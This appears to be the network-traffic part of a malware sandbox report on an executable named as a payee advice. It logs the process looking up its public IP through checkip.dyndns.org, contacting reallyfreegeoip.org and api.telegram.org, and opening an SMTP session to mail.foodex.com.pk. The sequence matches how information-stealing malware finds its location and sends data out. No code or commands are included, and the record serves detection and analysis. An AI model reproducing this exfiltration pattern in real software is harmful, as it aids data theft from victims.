Nov 16, 2024 16:51:25.870665073 CET | 443 | 51078 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:25.870829105 CET | 443 | 51078 | 188.114.97.3 | 192.168.2.5
Nov 16, 2024 16:51:25.871107101 CET | 51078 | 443 | 192.168.2.5 | 188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.871651888 CET51078443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.876631021 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.878222942 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.881886959 CET8051077158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.881967068 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.883105040 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.883188009 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.883302927 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.888205051 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.523466110 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.525140047 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:26.525197029 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.525425911 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:26.525674105 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:26.525701046 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.576278925 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.148324013 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.150336981 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:27.150382042 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.297992945 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.298192978 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.298444986 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:27.327302933 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:27.331484079 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.332583904 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.337248087 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.337451935 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.337485075 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.337552071 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.337636948 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.342406988 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.984122038 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.019134045 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.019180059 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.019282103 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.019648075 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.019690990 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.029416084 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:28.631546021 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.633563995 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.633608103 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.771872997 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.772051096 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.772356987 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.772748947 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.820822954 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:28.826132059 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.826201916 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:28.829417944 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:28.829456091 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.829524040 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:28.830085993 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:28.830101967 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.674854040 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.674978018 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.677550077 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.677558899 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.677959919 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.679718971 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.727328062 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.920450926 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.920594931 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.920677900 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.924747944 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:35.588854074 CET5106980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:35.905664921 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:35.910789967 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:35.913348913 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:36.903776884 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:36.904170990 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:36.909475088 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.156805038 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.158248901 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.163191080 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.410407066 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.411195993 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.416707039 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.711673975 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.712052107 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.717178106 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.964631081 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.965051889 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.970184088 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.233315945 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.233643055 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.239176035 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.486479998 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.487504959 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487504959 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487561941 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487586021 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487607956 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.492645979 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492669106 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492685080 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492758036 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492770910 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:39.065809011 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:39.123308897 CET51084587192.168.2.537.27.123.72
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2024 16:50:23.364720106 CET | 53 | 55057 | 1.1.1.1 | 192.168.2.5
Nov 16, 2024 16:51:11.033442974 CET | 54827 | 53 | 192.168.2.5 | 1.1.1.1
Nov 16, 2024 16:51:12.194088936 CET | 52531 | 53 | 192.168.2.5 | 1.1.1.1
Nov 16, 2024 16:51:15.169121027 CET | 52844 | 53 | 192.168.2.5 | 1.1.1.1
Nov 16, 2024 16:51:15.177113056 CET | 53 | 52844 | 1.1.1.1 | 192.168.2.5
Nov 16, 2024 16:51:16.302436113 CET | 56601 | 53 | 192.168.2.5 | 1.1.1.1
Nov 16, 2024 16:51:16.310199976 CET | 53 | 56601 | 1.1.1.1 | 192.168.2.5
Nov 16, 2024 16:51:28.821724892 CET | 49855 | 53 | 192.168.2.5 | 1.1.1.1
Nov 16, 2024 16:51:28.828788042 CET | 53 | 49855 | 1.1.1.1 | 192.168.2.5
Nov 16, 2024 16:51:35.828573942 CET | 65409 | 53 | 192.168.2.5 | 1.1.1.1
Nov 16, 2024 16:51:35.903033972 CET | 53 | 65409 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 16, 2024 16:51:11.033442974 CET | 192.168.2.5 | 1.1.1.1 | 0x859e | Standard query (0) | api.onedrive.com | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:12.194088936 CET | 192.168.2.5 | 1.1.1.1 | 0x2e0b | Standard query (0) | fa3hwa.dm.files.1drv.com | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:15.169121027 CET | 192.168.2.5 | 1.1.1.1 | 0xe7b7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:16.302436113 CET | 192.168.2.5 | 1.1.1.1 | 0x5542 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:28.821724892 CET | 192.168.2.5 | 1.1.1.1 | 0x945 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:35.828573942 CET | 192.168.2.5 | 1.1.1.1 | 0x4afd | Standard query (0) | mail.foodex.com.pk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 16, 2024 16:51:11.043751001 CET | 1.1.1.1 | 192.168.2.5 | 0x859e | No error (0) | api.onedrive.com | common-afdrk.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2024 16:51:11.043751001 CET | 1.1.1.1 | 192.168.2.5 | 0x859e | No error (0) | common-afdrk.fe.1drv.com | odc-commonafdrk-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2024 16:51:12.259488106 CET | 1.1.1.1 | 192.168.2.5 | 0x2e0b | No error (0) | fa3hwa.dm.files.1drv.com | dm-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2024 16:51:12.259488106 CET | 1.1.1.1 | 192.168.2.5 | 0x2e0b | No error (0) | dm-files.fe.1drv.com | odc-dm-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2024 16:51:15.177113056 CET | 1.1.1.1 | 192.168.2.5 | 0xe7b7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2024 16:51:15.177113056 CET | 1.1.1.1 | 192.168.2.5 | 0xe7b7 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:15.177113056 CET | 1.1.1.1 | 192.168.2.5 | 0xe7b7 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:15.177113056 CET | 1.1.1.1 | 192.168.2.5 | 0xe7b7 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:15.177113056 CET | 1.1.1.1 | 192.168.2.5 | 0xe7b7 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:15.177113056 CET | 1.1.1.1 | 192.168.2.5 | 0xe7b7 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:16.310199976 CET | 1.1.1.1 | 192.168.2.5 | 0x5542 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:16.310199976 CET | 1.1.1.1 | 192.168.2.5 | 0x5542 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:28.828788042 CET | 1.1.1.1 | 192.168.2.5 | 0x945 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 16, 2024 16:51:35.903033972 CET | 1.1.1.1 | 192.168.2.5 | 0x4afd | No error (0) | mail.foodex.com.pk | foodex.com.pk | | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2024 16:51:35.903033972 CET | 1.1.1.1 | 192.168.2.5 | 0x4afd | No error (0) | foodex.com.pk | | 37.27.123.72 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 51066 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:15.186537027 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 16, 2024 16:51:15.831510067 CET | 323 | IN | HTTP/1.1 200 OK
Date: Sat, 16 Nov 2024 15:51:15 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2b604c40664c745ad194bba0d4b5b3ec
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                                                                                        Nov 16, 2024 16:51:15.835869074 CET127OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Nov 16, 2024 16:51:15.983059883 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:15 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 174cf367da2a4c55542b2ccd1c8cfa90
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                                                                                        Nov 16, 2024 16:51:17.133250952 CET127OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Nov 16, 2024 16:51:17.281337023 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:17 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: d301abba013a445b9d6bd843b897bf08
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 51069 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:18.046087027 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Nov 16, 2024 16:51:18.684346914 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Sat, 16 Nov 2024 15:51:18 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: a8f33eaee868a84cefbd72596201a3f7
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 51071 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:19.470623016 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 16, 2024 16:51:20.201165915 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Sat, 16 Nov 2024 15:51:20 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 82f7aba3642fe839f8bc4af2bba48e80
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 51073 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:20.965598106 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 16, 2024 16:51:21.615936041 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Sat, 16 Nov 2024 15:51:21 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 8b406d12e9326df02f3d7d8c29e86cdb
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 51075 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:22.802042961 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 16, 2024 16:51:23.446093082 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Sat, 16 Nov 2024 15:51:23 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 9bf3fa78514816169e5f06ec53445089
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 51077 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:24.217120886 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 16, 2024 16:51:25.112025976 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Sat, 16 Nov 2024 15:51:25 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: b3aa7b985787a2ce3c85a1043d1c4c12
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 51079 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:25.883302927 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 16, 2024 16:51:26.523466110 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Sat, 16 Nov 2024 15:51:26 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 53b6cc8c61e6d06e8300b0101e89a3cf
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 51081 | 158.101.44.242 | 80 | 6256 | C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
Timestamp | Bytes transferred | Direction | Data
Nov 16, 2024 16:51:27.337636948 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Nov 16, 2024 16:51:27.984122038 CET | 323 | IN | HTTP/1.1 200 OK
  Date: Sat, 16 Nov 2024 15:51:27 GMT
  Content-Type: text/html
  Content-Length: 106
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  X-Request-ID: 3f68b1d69ef8e3f73810cacf3b1dd0b5
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


